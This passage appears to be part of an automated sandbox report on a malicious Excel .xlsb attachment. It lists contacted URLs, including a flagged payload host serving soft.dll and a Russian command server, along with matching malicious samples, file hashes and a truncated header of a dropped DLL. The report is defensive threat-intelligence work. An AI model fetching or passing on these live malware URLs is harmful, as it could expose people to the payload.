                                                                              		high
                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                		high
                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                  		high
                                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                    		high
                                                                                    http://www.youtube.com/msapplication.xml7.20.drfalse
                                                                                      		high
                                                                                      https://ncus.contentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                        		high
                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                          		high
                                                                                          http://weather.service.msn.com/data.aspxD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                            		high
                                                                                            https://apis.live.net/v5.0/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                              		high
                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                		high
                                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                  		high
                                                                                                  https://management.azure.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                    		high
                                                                                                    https://wus2.contentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://incidents.diagnostics.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                      		high
                                                                                                      https://clients.config.office.net/user/v1.0/iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                        		high
                                                                                                        https://insertmedia.bing.office.net/odc/insertmediaD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                          		high
                                                                                                          https://o365auditrealtimeingestion.manage.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                            		high
                                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                              		high
                                                                                                              https://api.office.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                		high
                                                                                                                https://incidents.diagnosticssdf.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                  		high
                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                    		high
                                                                                                                    http://www.amazon.com/msapplication.xml.20.drfalse
                                                                                                                      		high
                                                                                                                      https://entitlement.diagnostics.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                        		high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                          		high
                                                                                                                          http://www.twitter.com/msapplication.xml5.20.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                              		high
                                                                                                                              https://storage.live.com/clientlogs/uploadlocationD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                		high
                                                                                                                                https://templatelogging.office.com/client/logD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://outlook.office365.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://webshell.suite.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                        		high
                                                                                                                                        http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/{B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat.29.drtrue
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://management.azure.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://graph.windows.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://api.powerbi.com/beta/myorg/importsD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://devnull.onenote.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://ncus.pagecontentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://messaging.office.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://augloop.office.com/v2D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://quickbooks.aeymotors.com/soft.dllsharedStrings.bintrue
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            		unknown
                                                                                                                                                            https://skyapi.live.net/Activity/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://clients.config.office.net/user/v1.0/macD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                                                                                              		high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              185.233.80.31
                                                                                                                                                              		authd.feronok.comRussian Federation
                                                                                                                                                              		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                              50.87.220.158
                                                                                                                                                              		quickbooks.aeymotors.comUnited States
                                                                                                                                                              		46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                              Analysis ID:433009
                                                                                                                                                              Start date:11.06.2021
                                                                                                                                                              Start time:05:05:46
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 8m 30s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Sample file name:my_attach_82862.xlsb
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Number of analysed new started processes analysed:46
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSB@15/67@7/2
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 4.7% (good quality ratio 4.4%)
                                                                                                                                                              • Quality average: 80.4%
                                                                                                                                                              • Quality standard deviation: 27.6%
                                                                                                                                                              HCA Information:Failed
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              Show All
                                                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.43.139.144, 52.109.76.68, 52.109.12.21, 52.109.8.24, 13.88.21.125, 23.218.208.56, 20.82.209.183, 2.20.142.210, 2.20.142.209, 88.221.62.148, 20.54.26.129, 40.126.31.3, 40.126.31.136, 40.126.31.5, 40.126.31.140, 40.126.31.142, 40.126.31.2, 20.190.159.131, 40.126.31.7, 92.122.213.194, 92.122.213.247, 152.199.19.161, 20.54.7.98, 20.54.104.15
                                                                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              05:09:28API Interceptor1x Sleep call for process: regsvr32.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              185.233.80.31SecuriteInfo.com..7135.dllGet hashmaliciousBrowse

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                authd.feronok.comSecuriteInfo.com..7135.dllGet hashmaliciousBrowse
                                                                                                                                                                • 185.233.80.31
                                                                                                                                                                HP7cjYBnlS.dllGet hashmaliciousBrowse
                                                                                                                                                                • 47.254.173.212
                                                                                                                                                                1.dllGet hashmaliciousBrowse
                                                                                                                                                                • 34.95.62.189
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                info_71411.vbsGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                soft.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                racial.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111
                                                                                                                                                                Know.dllGet hashmaliciousBrowse
                                                                                                                                                                • 35.199.86.111

                                                                                                                                                                ASN

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                UNIFIEDLAYER-AS-1USFax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                                • 162.241.7.171
                                                                                                                                                                WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 162.241.77.193
                                                                                                                                                                KCTC International Ltd.exeGet hashmaliciousBrowse
                                                                                                                                                                • 192.254.185.244
                                                                                                                                                                lTAPQJikGw.exeGet hashmaliciousBrowse
                                                                                                                                                                • 74.220.199.8
                                                                                                                                                                supply us this product.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.146.199
                                                                                                                                                                #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.74.169
                                                                                                                                                                3arZKnr21W.exeGet hashmaliciousBrowse
                                                                                                                                                                • 192.254.235.195
                                                                                                                                                                6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 216.172.184.23
                                                                                                                                                                HM-20210428 HBL.exeGet hashmaliciousBrowse
                                                                                                                                                                • 192.254.180.165
                                                                                                                                                                INQUIRY. ZIP.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.190.227
                                                                                                                                                                audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                research-1315978726.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 216.172.184.23
                                                                                                                                                                ExHNIXd73f.exeGet hashmaliciousBrowse
                                                                                                                                                                • 108.167.142.232
                                                                                                                                                                research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 216.172.184.23
                                                                                                                                                                research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 216.172.184.23
                                                                                                                                                                viVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                DEMLwnv0Nt.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 192.185.113.120
                                                                                                                                                                analysis-31947858.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 108.167.156.223
                                                                                                                                                                analysis-1593377733.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 108.167.156.223
                                                                                                                                                                SUPERSERVERSDATACENTERRUSecuriteInfo.com..7135.dllGet hashmaliciousBrowse
                                                                                                                                                                • 185.233.80.31
                                                                                                                                                                2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cplGet hashmaliciousBrowse
                                                                                                                                                                • 46.17.104.120
                                                                                                                                                                2 - #U041c#U0412#U0421 #U0423#U041a#U0420#U0410#U0407#U041d#U0418 - signed - (8uy).cplGet hashmaliciousBrowse
                                                                                                                                                                • 46.17.104.120
                                                                                                                                                                8s5P8pdch5.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.233.81.8
                                                                                                                                                                0CUmIGFwMf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.232.170.88
                                                                                                                                                                y1e1FV1UWs.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.232.170.88
                                                                                                                                                                091WJ1BnKf.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.230
                                                                                                                                                                svchost10.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.65.97
                                                                                                                                                                index.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.232.170.29
                                                                                                                                                                NATO_042021-1re4.docGet hashmaliciousBrowse
                                                                                                                                                                • 185.232.170.29
                                                                                                                                                                8UOSzpl9E1.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.180.231.94
                                                                                                                                                                UWbkgpAQuS.exeGet hashmaliciousBrowse
                                                                                                                                                                • 147.78.67.95
                                                                                                                                                                9MyoOYNXKe.exeGet hashmaliciousBrowse
                                                                                                                                                                • 185.195.27.245
                                                                                                                                                                LJiW5jWnuA.exeGet hashmaliciousBrowse
                                                                                                                                                                • 147.78.67.95
                                                                                                                                                                tFqfAPK60I.exeGet hashmaliciousBrowse
                                                                                                                                                                • 147.78.67.95
                                                                                                                                                                svchost.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.65.97
                                                                                                                                                                m2.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.88
                                                                                                                                                                2.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.88
                                                                                                                                                                m4.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.88
                                                                                                                                                                4.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.144.64.88

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                wa71myDkbQ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                Current-Status-062021-81197.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                ATT00005.htmGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                kxjeAvsg1v.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                VSA75RUmYZ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                iX22xMeXIc.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                QWkt5w3cO2.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                vTtOheCXBQ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                Check 57549.HtmlGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158
                                                                                                                                                                Docc.htmlGet hashmaliciousBrowse
                                                                                                                                                                • 50.87.220.158

                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\Public\SettingSyncY.dll
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):886272
                                                                                                                                                                Entropy (8bit):5.674513513570937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
                                                                                                                                                                MD5:5BA7AC7FA4F9E831679832B6CC22AEE8
                                                                                                                                                                SHA1:813DF24AC22C2666B28BC3E7FB9BD1EEF2A7F395
                                                                                                                                                                SHA-256:D2C19AC3EACE29239BF919C442556ABF782DA5953325EE6B2626482FBF442F29
                                                                                                                                                                SHA-512:A345B0749D5745640FD7908CDB142960DA22AC6029BAFDDC0666D11EB5033756C3CFDE84D2FB94DCBF418DF40D2CE49EC4A18B919714402B7045B96E619A27CD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~];V:<U.:<U.:<U....><U....;<U.7n..<<U.7n..+<U.7n..+<U.7n..,<U....1<U.:<T.c=U.7n...<U.7n..;<U.7n..;<U.7n..;<U.Rich:<U.........................PE..L....5.S...........!.....0...................@............................................@......................... >..[.......P................................'..P...8...............................@............................................text...{........0.................. ..`.data...,x...@.......4..............@....idata...............J..............@..@.rsrc................X..............@..@.reloc...'.......(...^..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{99BBC3EB-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7725011658677239
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwhoGcprPzGwpLhaG/ap8GBGIpcgdihI1GvnZpvgdih4Goo1qp9gdihRGo4cEZpo:rmZlZa2IW0Gt0nf09lM0wQBgB
                                                                                                                                                                MD5:FD403206FBACF7BA1922FFEB229A78E9
                                                                                                                                                                SHA1:002B50B3B9B71BAF1D82B31E35987F42572A00A5
                                                                                                                                                                SHA-256:AB6C3DCC02DB8F8214D71C9249B0DFDC4C0F215ADF18F158A835B4A85E9B50DA
                                                                                                                                                                SHA-512:47B4E2A4EEADFDBB43B5317A114BDEEA051E184FFE9D52CF13BF60C14963FC1C7D04B8AC2230589028068416F77C62A8B4F337C61A0EC173B021E4DBCA8A530F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B403EC42-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7731605803059567
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwpGcproGwpLByG/ap8BP7GIpcBRA5GvnZpvBRAHGo2qp9BRARGo4lpmBRnjGWEE:rvZwZe2/WPbtP6fPxlMPpz4EB
                                                                                                                                                                MD5:8B153FC719E2A3E5D5199D05526C1B0B
                                                                                                                                                                SHA1:9E8B931ABFC5730E7E12E9CC2337102C868B66CF
                                                                                                                                                                SHA-256:6BFC1E01DAD1EC91AE4753B1C5F0C423A18B022CD638A23E0546B87F8CE52A38
                                                                                                                                                                SHA-512:AA7792863EF894CBFDF4AA8ECEE90B785BC6FF2B84FF783BDCE5797114E6FA4550FD38BAA07D6D894B555C47857CB9875452FAB1267F0218AC688C99C13B92AB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C1F50A27-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29272
                                                                                                                                                                Entropy (8bit):1.7753706536991711
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:IwmEGcprEvGwpLp2G/ap8L9GIpchDNBGvnZpvhDsXGoalq1qp9hDXnWGo4GlqOly:rmYZEZZp02LvWhxOthHfh7RxMh1coXuB
                                                                                                                                                                MD5:45CE2DF9248F6EC1A9F3E0A8354CA162
                                                                                                                                                                SHA1:18E7FA0CC9C5ACEAB87D701AA684C51132237CAA
                                                                                                                                                                SHA-256:D0D79EB236F673501C6B2142B0E0C8786F3665D4241944DE2F993D3E160230EF
                                                                                                                                                                SHA-512:4BE21DF11415B8E7F6F9071BE63A2F5EB35DC68127769B66EAFCA83DB2BF6B877ABCE9AFCF212A546889824062105778D79C31001D9A1256FCF481000A0847C2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFEFB1DC-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
